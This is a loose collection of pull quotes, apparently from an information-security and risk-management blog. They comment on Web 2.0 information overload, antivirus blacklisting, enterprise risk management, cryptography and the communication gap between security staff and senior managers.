Risk management is about making decisions today that will protect us from the uncertainty of the future. We are not looking for one in a million (the expert) but rather a million and one (the power of many).
We feel more informed, more empowered, and more enamoured with the promise of the omnipotent web. The web 2.0 narrative has worked its magic and we tacitly commit into a seemingly virtuous circle of information inflation.
Navigation and search are just for people who don't have any friends.
Disconnect from Twitter when you are receiving more than one tweet per second.
The AV blacklisting industry has reached a point of diminishing returns - the marginal value of producing additional signatures is minimal, but the underlying model can offer no more advice than to simply keep doing exactly that.
It could be said that PageRank is one part brilliance and two parts daring.
Often business has the “snappy intuitively appealing arguments without obvious problems” - plus Excel … Snappy and plausible usually wins out over lengthy, detailed and correct.
The observation here is that the security function is no longer called upon to critically underwrite the security risks of a project, with the option to reject.
Compound this disconnect between management and technical people over hundreds of thousands of projects at the corporate, national and international levels, spanning the last 3o years, and you have the disaster Ranum is describing (and lamenting).
The worst case scenario for Web 2.0 is that we are heading for a singularity, precipitated by dividing our attention into informational units effectively rated at zero content.
Imagine you posed the following question to a group of top physicists. You asked them to present you with ideas for new research projects where they could assume that the budget included all the money that we have, all the money that has ever been, and the total financial assets of the world for the next 10 million years. Would the resulting proposals be credible?

AES-256 puts cryptanalysts on the same research agenda.

So for complex decisions that potentially have the greatest impact in terms of costs and/or reputation, in exactly the circumstances where a thorough risk assessment is required, transparency rather than rigour is the order of the day.
Doctorow remarks that the surprising outcome of this process was the realisation that we are missing a well-known service for handling key escrow in an era of military grade encryption being available to home users.
I don’t really think that there is a cult in operation over Bruce Schneier, but rather a hero was found when security as an industry needed to believe in heroes.
When I look back at crypto now it seems of similar consequence to the proportions of the Sun and Antares - not merely because my professional interests have changed, but in the vast equation that constitutes ERM, crypto is a variable with minor weighting. Its gravitational force is largely exerted on specialists, and rapidly declines (much faster than the inverse square law) beyond that sphere. It's just a pixel on the football-field sized collage of ERM.
So that’s 1,000 years of computation by a cluster that would envelope the earth to a height of one metre.
There are many posts and news articles of late on the TLS Renegotiation Attack. I had hoped that just by skimming a large number of these that some process of web osmosis would magically transfer an understanding of this vulnerability to me.
In the short term (and maybe the longer term as well) Diffie sees the cloud as a matter of trust. He advises to pick your supplier like you pick your accountant.
For each of us the web is a noisy channel, which we express through the need to search, subscribe, aggregate, recommend, post, tweet – in short a great cull of what finds its way onto our screens.
And while the traits of detail, accuracy and correctness are necessary for IT activities, they are fundamentally at odds with the type of messages and opinions that senior managers are expecting.
Some articles and posts have focussed on verifying passwords in software as the culprit, which is partly true, but the real issue is not software but insecure programming of software.
Gentry has estimated that building a circuit to perform an encrypted Google search with encrypted keywords would multiply the current computing time by around 1 trillion.